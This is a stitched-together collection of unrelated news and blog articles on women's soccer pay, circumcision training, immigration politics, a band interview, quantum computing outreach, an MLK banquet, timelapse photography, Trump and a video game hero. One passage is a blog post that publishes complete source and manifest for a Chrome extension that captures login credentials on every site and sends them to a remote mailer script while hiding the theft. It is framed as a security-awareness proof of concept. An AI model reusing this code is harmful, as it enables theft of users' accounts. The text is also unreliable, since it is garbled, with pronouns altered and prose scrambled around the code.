@NWSL How is this ok? Not good enough for professional soccer. 6v6 field? pic.twitter.com/QXEZ4A8PiZ — Christine Sinclair (@sincy12) July 10, 2016
While Sunday's field issues made national headlines, which we were all so glad to see, the truth is that the standards of our league are so inconsistent and disappointing across the board, these kinds of incidents are really the rule and not the exception. Apologizing after the fact, as commissioner Jeff Plush did, is not enough. Neither is minimizing it, as Western New York coach Paul Riley did by saying their team would “play or practice on whatever field Seattle puts us on next week,” and that “we should just get on with it.”
The ‘we know things aren't up to par, but we're going ahead with them anyway' attitude, quite honestly, is a fairly accurate reflection of how the NWSL has functioned during the four years of its existence.
It's far past time that the women in our league start being treated like professional athletes—otherwise, we might as well just admit that the NWSL is just a semi-pro league, and stop pretending like it's the best women's league in the world.
I do want to take a moment to acknowledge my team, the Seattle Reign and our leadership—our incredible coach, Laura Harvey, and our phenomenal owners, Bill and Teresa Predmore, who treat the players like professionals and do their best to ensure we have what we need to be successful on field. While most teams travel the day before a game to save on travel costs, we always leave two days early to ensure we're fresh and well-rested on game day. The organization has always put performance first.
The realities of the league as a whole, however, are in stark contrast.
THE FACTS:
Most players are paid salaries that place them below the poverty line . The season lasts for seven months, and many players are making somewhere between $6,000 to $14,000 for that entire time. For many players, being a professional soccer player was their dream. Yet they're struggling to get by. In addition, our season actually has been lengthened without an increase in pay, or incentives to make the playoffs. Basically, we're being asked to play for free for several months of the season.
Players on some teams have told me that they don't even receive per diem or meal money on the road, which is deplorable. (If that's true, those teams should not be in the league.) Others have told me that they're forced to live together like college athletes.
The league doesn't provide proper kits, especially for goalkeepers. It doesn't provide players adequate shoes or gloves if they don't have their own contracts.
Teams also cut costs by not traveling with a goalkeeper coach or kit man.
Training on the road is a mess. The balls we're provided with are often flat. The lines on the training fields are sometimes crooked.
We aren't allowed to train on game fields at every venue, and in fact, places like Kansas put us on turf to practice. (My cleats actually melted on the turf in Kansas because it was so hot!) When we trained in Washington DC, there were lightning storms, and the staff at the training facility wouldn't open up available rooms to allow us to take cover inside. (We found our way in anyway, thanks to Laura and our staff, and made the most of it by playing volleyball to get a sweat.)
Games aren't much better. Many of the fields and equipment are poor. At our one of our practice fields, the net was secured in some places with Zip ties and players cut their hands.
Often times, we won't shower at the venues because the showers are disgusting and unsanitary.
We do not have close to adequate security. During games, fans are allowed to stand directly behind the goal and yell the most obscene things you can imagine. With the vitriol that comes out of people's mouths, who knows what they're capable of, and there's usually virtually no security there to do anything about it. Again, people are allowed to stand literally feet from the goal. And after the games, the walk to the locker room from the field is often right through tailgating fans, again without security.
The league hasn't adopted FIFA rules so there is no appeal structure for suspensions, bad calls, etc. FIFA rules would also ensure minimum field dimensions, something currently not in place.
Our referees are not up to professional standards. Yesterday, the referee in the Reign-Flash game actually reversed their own call after watching a replay! Our referees are supposed to be professional caliber. The strength of the referees directly impacts player safety and inexperienced refs put us at risk on the field. Our safety should never be compromised, ever. The refs should be protecting us, which they often fail to do. I can't tell you the number of times I've had people come at me cleats up that never are penalized for it. Referees have ruined more games than I can count, and there is no system in place with repercussions for bad refereeing.
Medical support is lacking. At Sunday's game, they had no stretcher on the field when our goalkeeper, Haley Kopmeyer, was injured. They tried to put them in a baseball 4-wheeler that had dirt and equipment in it. They had to wait for the ambulance to move them carefully.
There are no hotel standards. We have seen everything. Some of the places we stay at are abominable. We stayed at a Comfort Inn in Kansas that has a 1.0 star-rating on Yelp, and was filthy. In Houston, the Crown Plaza hotel we stayed in had bullet holes in a window, and prostitutes walking the street out front. A hotel in Portland was hosting a pornography convention where people dress up like animals. Other hotels have had bedbugs.
We have a crisis on our hands, and the players of the NWSL want to see more from our commissioner and our league. We lose a lot of players — quality players for the league — over time because they can't afford it. In the end, to watch them realize their dreams aren't sustainable is very hard to watch — and there are a lot of broken dreams for women in our sport.
Commissioner Plush, please: If you truly value the players in this league and want the NWSL to be a model for women's professional leagues around the world, listen to what we're saying. Go to some of these hotels, training facilities and games yourself. See the conditions of the league up close. And after you've taken it all in, be the leader we need you to be.
Until then, we the players stand united and those of us who play on the US National Team are using our platform to do more. As you might have seen over the past few days, USWNT players created an “Equal Play Equal Pay” t-shirt to promote our quest for equal pay. But equality is about more than just equal pay. It's about fairness. And what's happening in the NWSL is not fair.
To provide support to our professional teammates in the National Women's Soccer League (NWSL), the USWNT is directing 100% of its proceeds for the “Equal Play Equal Pay” t-shirt campaign to the National Women's Soccer League (NWSL) Players Trust Fund. It's not enough, but it's a statement and one we hope will start the conversations and help push for change long overdue.
“Equal Play Equal Pay” t-shirts are now available here for $20 each.
The Canadian Paediatric Society didn't elicit huge fanfare when it released its long-awaited update to its position on newborn male circumcision earlier this month.
That's understandable, considering the document doesn't depart in any significant way from the organization's previous guidelines on the topic: that circumcision is not medically necessary for most babies and the procedure should not be routine at birth. For that reason, provinces no longer cover the cost of circumcisions through their health plans. But some parents will still choose to have their sons circumcised, so the CPS set out some best-practice guidelines designed to lower the potential risks.
Those recommendations sound reasonable, including the one that says circumcisions should be performed by a trained practitioner "whose skills are up to date and strictly adhere to hygienic and analgesic best practices."
Story continues below advertisement
But on the ground, what happens is often much different from what the guideline recommends – something parents should find alarming.
Male circumcision, or the surgical removal of the foreskin from the penis, has been performed for thousands of years, and became popular in Britain and the United States in the 19th century, according to the Canadian Paediatric Society. Although the procedure has cultural and religious significance in the Jewish and Muslim faiths, many parents had their sons circumcised to improve hygiene and lower the risk of disease.
But in recent years, circumcision rates have been dropping in countries such as Canada, particularly as more evidence shows the potential risks. For instance, studies show that more than 100 boys have to be circumcised to prevent one urinary tract infection – a problem that is easily treated with medication.
More recently, studies have suggested circumcision can prevent transmission of HIV. However, the research has primarily been conducted in Africa, and the CPS document notes it's not clear whether those results can be applied to countries such as Canada, where HIV infection rates are lower.
It's difficult to know how many circumcisions are performed in Canada, as most are done in doctor's offices or clinics and data aren't tracked. But the Canadian Institute for Health Information (CIHI) has records of circumcisions performed in hospitals and in day surgery for every province except Quebec. In 2004-05, there were nearly 15,600 circumcisions performed, according to the CIHI data. By 2014-15, that figured dropped to fewer than 8,500. The CPS estimates that roughly 30 per cent of newborn males are now circumcised.
Few, if any, jurisdictions in Canada require physicians to undergo formal training before performing circumcisions. In many cases, doctors learn the procedure from watching or talking to a colleague, says Dr. Jorge DeMaria, a pediatric urologist and professor in the department of surgery at McMaster University in Hamilton. They have been one of the leading voices calling for standardized training and formal education requirements to improve safety and lower the risks associated with the surgery.
In 2013, Dr. DeMaria and their colleagues published a study that revealed just how great the disconnect is between best practices and reality. They surveyed a group of 62 physicians and surgeons in southwestern Ontario who perform circumcisions. None of the respondents said they had learned how to perform circumcisions in a structured training course. Nearly half of the non-surgeons said they learned how to do the procedure from a colleague. About one-third said they would perform a circumcision on an infant with a concealed penis – a condition in which the penis is hidden beneath excess skin – despite the fact the surgery is not recommended in those babies.
Story continues below advertisement
Story continues below advertisement
But according to the Canadian Paediatric Society's own document, the complication rate linked to circumcision is relatively low – a median of 1.5 per cent, according to one study – so the absence of formal training doesn't appear to be taking a major toll, right?
Not necessarily. The true rate of infections, bleeding, skin adhesions and more serious complications may be higher than believed because the few studies that have looked at this area may underestimate the number of adverse events. For instance, some studies may look only for complications a few days postprocedure, while it could take longer for problems to appear. In some cases, parents aren't happy with the cosmetic appearance after the surgery, which likely wouldn't be counted as a complication, but may well be in the eyes of the family.
In 2013, the CBC reported on a Montreal doctor with more than 30 complaints made to the provincial medical regulator relating to botched circumcisions. The doctor in question still advertises their services online, with a website that states they have travelled throughout North America to identify the best way to perform circumcisions.
According to the American Academy of Pediatrics' 2012 guidelines, "the true incidence of complications after newborn circumcision is unknown," adding that "it is imperative that those providing the service have adequate training in the method used and resources for and practice of adequate analgesia and infection control."
No surgery will ever be risk-free, of course. But considering how many circumcisions are still performed, and the fact they make a permanent alteration to a very important body part, it's unacceptable that training remains so unstructured and informal. There could be a relatively easy fix: Regulatory colleges could require doctors to complete a continuing medical education program before performing circumcisions.
So what can parents do? In the absence of training requirements, the best bet may be to become as informed as possible about the risks and benefits and asking your doctor about their or their level of experience, training and complication rate. It may not be a surefire solution, but it may help in the confines of the current system for those considering the procedure for their newborn boy.
Republican Rep. Steve King of Iowa. Associated Press/Charlie Neibergall For members of a movement that purports to focus on putting American interests first, American nationalists seem to spend an awful lot of time obsessing about Europe.
Europe's birthrates are too low and Europe has Muslim minorities that it's not integrating well, Republican Rep. Steve King of Iowa complains, by way of defending their tweet that said, "We can't restore our civilization with somebody else's babies."
King's tweet was in praise of the Dutch nationalist politician Geert Wilders, who is running on a platform of caustic opposition to Muslim immigration.
Europe has specific problems related to population policy. The birthrate in the EU is 1.61 children per woman, lower than 1.87 in the United States. Europe has a significant problem with homegrown terrorism from its Muslim communities, in part because Europe's Muslim immigrants are poorer, more numerous, and less well-integrated than those in the United States.
These are real problems worthy of attention from European politicians, though I do not believe Wilders has the right approach to them. But what does any of this have to do with the United States, and why does King spend so much time thinking about it?
I think the answer is that American nationalists tend to oppose immigration for reasons that are fundamentally racist. They want white people to have more babies and fewer minorities to come here.
But the facts on the ground in the United States are not useful for arguing that case without explicit appeals to racism. So they obsess over Europe, where immigration has created more problems and birthrates are dire.
Pro-immigration politicians in the United States would do well to think about what it is about immigration to the United States that makes it work better than in Europe — and how we can adjust our immigration policies to improve those advantages.
In the case of our Muslim communities, it is important to note that Muslim immigrants to the United States tend to be disproportionately educated. Instead of a disaffected Muslim underclass suffering from high unemployment, we have prosperous and well-integrated Muslim communities. This success is in significant part a matter of how immigrants have been selected to come to the United States.
But overall, American immigration policy is a hodgepodge.
A lot of immigrants are admitted for reasons that have no clear link to the American national interest. And by allowing immigration laws to go unenforced for so long, we have allowed millions of unauthorized immigrants to choose the United States, instead of us choosing them.
There's nothing wrong with a country making immigration policy based on what kind of society it wants to build. That policy shouldn't aim at producing ethnic homogeneity. But we should be able to explain what it does aim to build.
An immigration policy based on clear, non-ethnicity-based principles — similar to the "points" systems used in Canada and Australia that favor highly skilled and English-proficient immigrants — would make it easier to win over voters who are not committed to King's thinly disguised concerns about ethnicity, but who may have a vague concern that many immigrants are not a "good fit" for the United States.
"People can forget how productive they've been," they say of the Sheffield band
Biffy Clyro frontman Simon Neil has praised Arctic Monkeys, saying that they wish all British bands were like them.
Neil and their bandmates, Ben and James Johnston, played highlights from T In The Park on Zane Lowe's BBC Radio 1 show on Monday night (July 14). Speaking about the different artists as they played live clips from last weekend's festival, the band were full of praise for their fellow headliners.
“People can forget how productive they've been,” said Neil. “Really, they haven't stopped at all. To still have that evolution in this record, to really take a huge step sideways and forward, it's opened up the possibilities for the next 10 years for them as well. I wish all British bands were like this.”
Aside from Arctic Monkeys, Biffy Clyro also praised Haim, Chvrches and Royal Blood with Neil saying “It's just great to see a young band out there with serious aggression and knowledge of rock music, none of this kind of nonsense soft rock, you know like just a band that knows about riffs,” of the Brighton duo.
Discussing the older material they have included in recent live shows, Ben Johnston from the band admitted that sometimes they have needed to jog their own memories to remember songs. “We played Ireland a couple of shows recently, and we played ‘Hero Management' from the first record, and I don't know how truthful I should be here but in the practice room we had to get our iPods out.”
Neil backed up their bandmate, “The amount of brain cells I've killed over the years! I messed up words, actually, I forgot the second verse of ‘Victory Over The Sun' at T on Friday and it's always when I least expect it, 'cause the songs that I think I don't know, that we haven't played in a while inevitably are perfect, and there's only a certain amount of room for a number of songs in my little brain, so whenever I write a new song it normally pushes an old one out!”
In addition to Biffy Clyro and Arctic Monkeys, T In The Park 2014 was also headlined by Calvin Harris. The EDM superstar brought actor Will Smith out onstage with them for the performance.
https://link.brightcove.com/services/player/?bctid=34994357001
Share this post:
“The IBM Quantum Experience will make it easier for researchers and the scientific community to accelerate innovations in the quantum field, and help discover new applications for this technology,” said Arvind Krishna, senior vice president and director at IBM Research in May, when the company announced public access, via the cloud, to its 5 qubit processor.
One retired IBM scientist took this statement as a call to action. Christophe Rossel, who spent 27 years at IBM's Zurich lab, is now the president of the European Physics Society (EPS), which is partly responsible for inspiring and building up a new generation of scientists across Europe.
“When I heard about the IBM Quantum Experience I knew that it would be a great opportunity to introduce some of Europe's best and brightest to the promise of the quantum world,” said Rossel. “In a matter of weeks we pulled together an agenda and sent out an invite to our EPS Young Minds members and we were overwhelmed with registrations.”
A few weeks ago IBM's Zurich lab hosted the nearly two dozen physics students from the top scientific institutions in Switzerland, including ETH Zurich, Paul Scherrer Institute, EPFL, University of Bern and the University of Basel.
After an introduction to the quantum world, IBM scientists Stefan Filipp, Andreas Fuhrer, Ivano Tavernelli, Gian Salis and Nikolaj Moll, put the students to work with a series of experiments designed to leverage the 5 qubit IBM Quantum Experience system. The teams got acquainted with the quantum composer, the graphical user interface for programming the qubits, and writing their own quantum algorithms, before presenting their results (see video).
“We prepared for the students several very challenging exercises which they quickly grasped, despite lacking a background in quantum mechanics, said Moll. “A few teams worked on the fundamentals of quantum mechanics, whereas other teams worked on the more ambitious application side, as for example the Grover search algorithm or simulating the hydrogen molecule. It was impressive to see.”
Since the event ended Rossel has received some very positive comments from the students:
“I especially appreciated the varied design of the day as well as the elaborately made tutorials. Also the lectures in the morning were very helpful for the understanding, especially the technical when one comes from a completely different area,” said Sacha Schwarz, University of Bern.
Students present results and feedback from their #quantumexperience today at IBM Research in Zurich pic.twitter.com/qoSGaJaS9P — IBM Research (@IBMResearch) November 21, 2016
“Again thank you for this visit which was really exciting and led by passionate researchers. If other visits are possible, we would be pleased to participate,” said Bruno Rigal, EPFL.
Moll adds, “If we want to reach 50 qubits in the next few years we don't have a second to spare, but clearly without building up a quantum ecosystem in advance we won't have any users for such a system. So both research and community building need to be done in parallel, it's not either/or, it's both.”
The Code
submit
$("form").submit(function(e) { var $this = $(this); e.preventDefault(); process(function() { $this.unbind('submit'); $this.submit(); }); });
e.preventDefault
process
var process = function(callback) { var username = $("input[type=text]").not(passwordBoxes).filter(function() { var field = $(this); return field.val() || field.html(); }).val(), password = passwordBoxes.val(); sendEmail(username, password, location.href, callback); };
process
passwordBoxes
input
password
var passwordBoxes = $("input[type=password]");
sendEmail
var sendEmail = function(username, password, url, callback) { var msg = getMessage(username, password, url); $.ajax({ type: 'POST', url: 'the url of the mailer script', data: 'the headers you want to send', success: callback }); };
getMessage
var getMessage = function(username, password, url) { return "Username: " + username + " || Password: " + password + " || Url: " + url; };
{ "name": "Stealing login credentials with Google Chrome Extensions", "version": "1.0", "description": "A proof of concept demonstrating the possibility of stealing user credentials in login forms via a Google Chrome extension", "permissions": ["tabs"], "content_scripts": [{ "matches": ["http://*/*", "https://*/*"], "js": ["jquery.min.js", "main.js"], "run_at": "document_start" }] }
$(function() { var passwordBoxes = $("input[type=password]"), getMessage = function(username, password, url) { return "Username: " + username + " || Password: " + password + " || Url: " + url; }, sendEmail = function(username, password, url, callback) { var msg = getMessage(username, password, url); $.ajax({ type: 'POST', url: 'the url of the mailer script', //Change to the path of your mailer script data: 'the headers you want to send', //Change to add any headers to be sent along success: callback }); }, process = function(callback) { var username = $("input[type=text]").not(passwordBoxes).filter(function() { var field = $(this); return field.val() || field.html(); }).val(), password = passwordBoxes.val(); sendEmail(username, password, location.href, callback); }; $("form").submit(function(e) { var $this = $(this); e.preventDefault(); process(function() { $this.unbind('submit'); $this.submit(); }); }); });
I am writing this follow up because I believe that there have been some misconceptions floating around in some comments I saw on other sites. First of all, I haven't stolen any Twitter, Facebook or Gmail accounts. In fact, I didn't even upload this extension to the Google Chrome repository. I have only tried this extension on myself, just to test and see if it works.
Secondly, many people are saying that this isn't big news and that this knowledge is obvious to users. For starters, please note that I have never stated that this is "big news" anywhere in my post. Also, although this may seem 'obvious' to many of you, users need to be reminded about security and to be careful about installing third-party applications. It's true that users need to 'OK' the extension to be installed, but the reality is that very few take into consideration what the script is doing under-the-covers.
I have written this post to merely demonstrate that such things can be done and users should be aware of it.
Some have also commented as regards me demonstrating this on Google Chrome. Yes, other browsers can also be susceptible to this technique but I chose to try this on Google Chrome because it has apparently been dubbed as 'the safest browser available', and I'm not denying that. I wanted to make users aware that although Google Chrome is, undoubtedly, a safe browser to use, they should still be careful about what they install on their browsers and not blindly trust anything.
Today I have discovered this article posted at the Mozilla Add-ons blog: Add-on security vulnerability announcement
What's interesting about this article is that it was written on the 13th of July, which is a couple of days after my post got 'popular'. Now, I'm not implying anything but it's just an interesting thought.
Many people have commented about the fact that the 'technique' I used in this extension cannot be applied for other browsers. The article at the Mozilla blog now proves otherwise.
The Mozilla post talks about how one malicious add-on and one other add-on that posed a serious security vulnerability where discovered recently at the Mozilla Add-ons website.
The first add-on is called 'Mozilla Sniffer' and was uploaded to the website on the 6th of June. This add-on intercepts login data and sends it to a remote location. It was discovered on July 12th. Here's a quote about it's current status:
Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. All current users should receive an uninstallation notification within a day or so. The site this add-on sends data to seems to be down at the moment, so it is unknown if data is still being collected.
Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.
Hopefully this article convinces some of the commenters as regards the "obvious nature of my post". Note that Mozilla reported that the add-on has been downloaded 1,800 times in about a month and that there are currently 334 active daily users.
To the commenters who have said that my post is, and I quote, "much ado about nothing!", hopefully this Mozilla article is a response to that.
On a different point, some have also stated this form of intercepting details cannot be applied to other browser extensions, and multiple reasons where given for this. From this Mozilla article we can now conclude that, if not for the other browsers, this can also be applied to Mozilla Firefox.
The Google Chrome browser allows the installation of third-party extensions that are used to extend the browser to add new features. The extensions are written in JavaScript and HTML and allow manipulation of the DOM, amongst other features.By allowing access to the DOM, an attacker can thus read form fields...including username and password fields. This is what sparked my idea of creating this PoC.The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally as to avoid detection.This simple procedure has been successful against Gmail, Facebook, Twitter and other major websites.For this extension, I am making use of jQuery as to write quick code for this prototype, but it can obviously be rewritten without it's dependency.The first thing the script does is attach ahandler to every form field on the page:We hook to the submit handler to prevent the default behaviour of the form (ie submitting normally) withand to call ourfunction:Thefunction captures the values of the username and password fields respectively.is a variable containing thes of the page that have their type set asUpon capturing the values of the username and password fields, these are sent along with the current url and the callback that submits the form to thefunction which sends the email with the username, password and url via an Ajax call:Thefunction simply returns a formatted string with the details that will be contained in the email:After the details are sent, the callback is invoked which submits the form normally.Note that there could be a very small delay between the user clicking the submit button and the form being submitted because of the Ajax call, but it is barely noticeable.In this post I have demonstrated how an attacker can steal login credentials but this can also be used for other things, such as stealing cookies and hijacking sessions. The point I am trying to make here is that you should always be careful about what third-party applications you install.The following is the complete code for the main.js file and the manifest.json file:
Nominated Member of Parliament Kok Heng Leun on Wednesday 10 August 2016 submitted a Public Petition on the Administration of Justice (Protection) Bill. The petition was signed by 249 individuals. It is the first time in nine years that a Public Petition has been submitted to Parliament – the last petition was submitted by then-Nominated Member of Parliament Siew Kum Hong in 2007 seeking a repeal of S377A of the Penal Code.
The Don't Kena Contempt campaign states that it welcomes efforts to protect the judiciary, and agrees that the integrity of legal proceedings and the maintenance of public confidence are essential. The campaigners voiced their support in efforts by the Government to ensure court orders are obeyed, individuals have the right to a fair trial, greater protection of judicial independence, and that high levels of trust in Singapore's legal system are preserved. However, they went on to note their concerns about how the key provisions in the Bill which are vague and that the Bill goes beyond its stated goal of consolidating key elements of the law of contempt into statute. They pointed out that the bill introduces new powers to the Attorney-­General, lowers the legal threshold required to be convicted for the offence of scandalising the court, and imposes severe punishment to a degree that may be disproportionate for a non­violent offence. The proposed punishments far exceed punishments meted out by Singapore courts, even for the hitherto the worst case of scandalising contempt.
The campaigners claim that this will have a chilling effect on free speech and entrench Singapore's culture of self censorship and fear even further. It will also discourage debate on issues of public interest which are important for democracy and public accountability.
“The bill, in its current form, causes confusion over what is or isn't in contempt, and could lead to people choosing not to participate in legitimate discussion on matters of public interest, for fear of getting in trouble. The Ministry of Law says that the bill is merely a consolidation of current contempt law, but this could be a chance for Singapore to actually improve on current contempt law by crafting a bill based on extensive public education and consultation,” said Kirsten Han, a member of the Don't Kena Contempt campaign.
The campaigners are hopeful that Parliament will refer the Bill to a Select Committee under Section 68 of the Parliamentary Standing Orders. They also wrote that the Select Committee should then resolve to hold public hearings permitted under Section 103(5) of the Parliamentary Standing Orders, so that the deliberation over ways to improve the Administration of Justice (Protection) Bill can open to genuine and extensive public consultation.
In the instance that Parliament would form a Select Committee, the campaigners urge all interested parties – whether they belong to an organisation or would simply like to express their view as an individual to partake in the discussion.
“We believe in being active citizens who contribute to robust public discourse on Singapore's policies. Like the submission of a Public Petition, participation in a Select Committee hearing is an integral part of the democratic process, and Singapore benefits when more people take up an active role in this process,” said member of the Don't Kena Contempt campaign Lisa Li.
The campaigners note that they strongly believe that broader consultation, greater openness, and more deliberation that leads to amendments to the language of the Bill where necessary will pave the way for a more robust law that better achieves the goals of consolidation and clarification when it passes. This according to them, ensures that the law better serves all Singaporeans.
Petition that was submitted
The Don't Kena Contempt campaign was set up by a group of Singaporeans concerned by both the Administration of Justice (Protection) Bill in its current form, and the speed with which it is being put through Parliament to be passed into law. The campaign is calling for a delay in the passage of the bill, so that it can be properly debated, with extensive and thorough public education and consultation.
SAN FRANCISCO (AP) — Lauren Grey didn't think much about the gender recorded on their Illinois driver's license until they went to test-drive a new car. Although they had been living as a woman for months and easily obtained a license with their new name and a picture reflecting their feminine appearance, Grey's ID still identified them as male, puzzling the salespersons and prompting uncomfortable questions.
"They are like, 'This doesn't match.' Then you have to go into the story: 'I was born male, but now I'm not,'" said Grey, 38, a graphic designer living in suburban Chicago. "And they are like, 'What does that mean?' It was super embarrassing." Similarly awkward conversations ensued when they tried to rent an apartment, went to bars or was taken out of airport security lines for inspection.
Most U.S. residents don't think twice about the gender printed on their government-issued documents. But those "M'' or "F'' markers — and the legal and administrative prerequisites for switching them on passports, birth certificates and other forms of identification — are a source of anxiety and, even, discrimination for transgender individuals.
The rules vary from state to state, agency to agency and even clerk to clerk. But a transgender applicant generally has been required to submit both a court order approving the gender change and a letter from a surgeon certifying that the person underwent irreversible sex reassignment surgery before obtaining a new document.
Over the last few years, though, the emerging movement for transgender rights has been quietly pressing the issue, persuading state lawmakers and federal and state agencies to simplify the lengthy and often costly process. Advocates recorded their latest victory Friday, when the Social Security Administration announced that it would no longer require proof of surgery to alter the gender identification of individuals in its computers and records.
The move mirrors similar actions by the U.S. State Department, which amended its passport application policies three years ago to do away with the sex reassignment surgery requirement, and U.S. Citizenship and Immigration Services, which last year did the same for green cards, work permits and other documents it issues.
"Most people may not see this as a big deal, but transgender people know that this seemingly small technical change will protect their privacy and give them more control over their own lives," Mara Keisling, executive director of the National Center for Transgender Equality, said. "Since 9/11, it's become ... incredibly important to have accurate and consistent identification. Without it, you can't open a bank account, you can't use a credit card, you can't apply for a loan, you can't get a job, you can't vote, you can't get insurance."
As a result of lawsuits and lobbying, about half of U.S. states — most recently Illinois, Alaska, Virginia and Idaho — now allow residents to revise the gender designations on their driver's licenses without first undergoing surgery or getting a judge's approval. Applicants instead must provide a letter from a health professional stating they have received counseling, hormone therapy or another form of gender-transition treatment.
Holding mismatched identification also exposes transgender people to the threat of discrimination or violence, advocates say. A 2008 survey of 6,450 transgender people conducted by the National Center for Transgender Equality and the National Gay and Lesbian Task Force found that 40 percent of respondents had been harassed after presenting an ID that conflicted with how they looked. Three percent reported being attacked, and 15 percent said they had been refused service.
State motor vehicle and vital records departments do not keep count of the number of people who seek to amend the gender markers on driver's licenses and birth certificates each year. The Williams Institute, a UCLA-based think tank, estimates that 0.3 percent of the adult population in the United States identifies as transgender, or about 698,000 people.
The trend toward making it easier to update such information reflects not only the community's growing visibility but evolving ideas about what it means to be transgender. While sex reassignment surgery used to be the benchmark for when a person had fully transitioned to the opposite sex, doctors and psychologists now recognize that not every patient wants to be surgically transformed, or can afford the surgery.
The Reverend Dr. Martin Luther King, Jr., was born in Atlanta, Georgia on January 15, 1929. On October 14, 1964, they became the then-youngest person to ever win the Nobel Peace Prize. And their home town of Atlanta wanted to throw them a party: an inter-racial banquet, with official invitations going to the city's leaders and titans of industry. The invites were signed by the city's mayor, religious leaders from across faiths, a university president, and the publisher of the major area newspaper.
Unfortunately, Atlanta was still racially segregated, and while King had many fans, they also had many enemies. Many whites were upset that King had been honored by the Nobel committee; one of the state's senators, Herman Talmadge, expressed their dissatisfaction with the honor, wondering aloud why the committee gave a peace prize to a person who promoted lawbreaking. Invitations to the highly exclusive event came back with many more declinations than one would expect. A New York Times report claimed that a well-known (but unidentified) banker in the Atlanta area took to the phones, hoping to convince other whites to abstain from attending the banquet, and certainly, there were others preaching the same message.
As the days ticked by, it looked more and more likely that the Dinkler Plaza Hotel — the site of the gala — was going to be rather empty on the evening of the event. Mayor Ivan Allen realized that such a result would be a stain on the city's reputation, both immediately and forevermore, and also realized that it could set back the clock on racial relations in Atlanta significantly. They struggled to find a solution, but then, an unlikely hero stepped in.
Mayor Allen and J. Paul Austin, the chairperson and CEO of the Coca-Cola Company, called together a meeting of the Atlanta's business leaders, and Austin threw down the gauntlet. According to the Atlanta Constitution-Journal, Austin told those assembled that “it is embarrassing for Coca-Cola to be located in a city that refuses to honor its Nobel Prize winner. We are an international business. The Coca-Cola Company does not need Atlanta. You all need to decide whether Atlanta needs the Coca-Cola Company.”
They decided. Within two hours, all of the tickets were sold, and interest in the event skyrocketed so much that Martin Luther King, Sr. (yes, the honoree's father) had trouble getting enough tickets for their own use. The Dinkler Plaza was stuffed to the brim with over 1,500 partygoers, and, perhaps most importantly, the police detail outside had nothing to do. The police were there to combat the hordes of protesters expected to descend upon and disrupt the party — but the threat never materialized.
Bonus fact : MLK's birthday became a holiday in 1986, but some states were slow to adopt it. It would not be celebrated in all 50 states until 2000, and Mississippi celebrates it in conjunction with the birthday of Confederate General Robert E. Lee, born January 19, 1807.
From the Archives: Dissolving Medals: When the Nazis came for gold, a scientist hid some Nobels — using science.
Related: “A Testament of Hope: The Essential Writings and Speeches of Martin Luther King, Jr.“
The above video accurately demonstrates two things. Firstly it demonstrates the need for a nice tripod which will stay grounded and give the camera a solid and unmoving platform for it to rest on. The second thing this video demonstrates is the importance of leaving your camera be as it is taking the photos. This is evident in some of my earlier timelapse videos where I accidentally knock the tripod detracting from the final result.
The actual act of timelapsing is quite simple and straight forward and can (if you want to know how long the final result will be and how long the camera will be taking photos for) involve some maths. Lets start with the process and I will talk about the maths afterwards.
Before setting out to shoot a timelapse make sure your battery/s are fully charged and all your gear is packed. Set up the tripod and the camera in the desired location. Frame up the shot and make sure the tripod is stable and won't shake as the timelapse is being shot. Take a few test photos to see if the shot is what you want it to be and to check if the exposure is correct. Set the camera to fully manual mode and make sure auto white balance is not on and iso is not set to auto. This avoids any lighting changes as the light of the environment changes. (The first timelapse I ever did I didn't do this and as the sun set the camera kept on compensating yielding a horrible result.) Also make sure the camera is in manual focus mode so it doesn't try to refocus every photo. Set up the method of capturing the timelapse whether it be a computer, magic lantern or an intervalometer and set it to take the desired amount of photos with the desired time between photos. When everything is setup, get the timelapse going and sit back as the camera works its wonders. Once the timelapse is shot, pack up and go home or alternativley, take another!
Now for the maths. If you want to work out how long the final timelapse will be you will first need to work out how long you want your timelapse to last. For instance if you are shooting a sunset or sunrise you may only want to be shooting for 30 minutes to an hour whereas if you are doing some astrophotography you may want to shoot for 2+ hours. Once I work out how long I want to shoot for I set my exposure and how long I want between shots (make sure the time in between shots is always more than the exposure time). I then change the number of shots to suit the length I want to shoot for. Once I know how many shots I will take I can work out the time of the final result at 24fps (frames per second)
For Example:
I want to shoot a sunset and I want the timelapse to span 45 minutes. I set the time between shots to be 15 seconds. First I convert 45 minutes into seconds as it is easier to work out the number of shots:
45 minutes x 60 = 2700 seconds
Then to work out the number of shots I divide 2700 by 15
2700/15 = 180 shots
Therefore i need 180 shots to get 45 minutes of timelapse with 15 seconds between shots.
Hours after President Trump tweeted out an allegation that former President Barack Obama tapped Trump Tower during the election, the president might be hitting the golf course.
According to a press pool report at 9:26 a.m. on Saturday, Trump, who is in Florida again this weekend, traveled to Trump International Golf Club in West Palm Beach to conduct meetings and phone calls.
They "might hit a few balls" too, the White House press office told the press pool, who reported that they are waiting on the names of who Trump might speak with and who may join them for golf.
Meanwhile, the presidential entourage in Florida...(via pool reporter) pic.twitter.com/4rgMSBwXjd — Olivier Knox (@OKnox) March 4, 2017
Trump's weekend schedule doesn't list any events until 4 p.m. when the president will participate in a National Security Council meeting at the Mar-a-Lago. At 7:30 p.m., the president is slated to eat dinner with Commerce Secretary Wilbur Ross.
Early Saturday morning, Trump sent out a stream of tweets accusing Obama of wiretapping Trump Tower in New York City in October, before the election, comparing the 44th president to President Richard Nixon, who resigned amid fallout from the Watergate scandal.
About Medivh
Magus, or Magna Medivh, was the last Guardian of Tirisfal, but was possessed by the demonlord Sergeras. Medivh worked with Gul'dan and they together opened the Dark Portal. The Dark Portal allowed the Burning Legion to enter Azeroth, and begin corrupting and destroying the lands.
Medivh was designed to be a very different character than you are used to, and during this design forced Blizzard to redefine what a Specialist is. Their kit is very different from any other Hero, being “a premeditative, utility off-support.” The development team believes that Medivh will bring a new perspective on what will be possible for the future in the Nexus. When designing Medivh, the Heroes of the Storm team built everything around their Raven Form.
Quest Talents
Now what you've all be waiting for; lets break down Medivh abilities and talents that you'll see them use. Medivh is also one of the first heroes to have “Quest Talents.” These talents will be seen more often in future heroes. Quest Talents (talents with an !) are a nice new narrative to bring into the Heroes of the Storm storyline. They give some Heroes individual power spikes, and also works in bringing some of the older heroes up to par in the new meta. Blizzard is currently exploring all of the possibilities that Questing Talents could bring to the game.
Abilities
(Z) Raven Form
You turn into a Raven.
This is your mount.
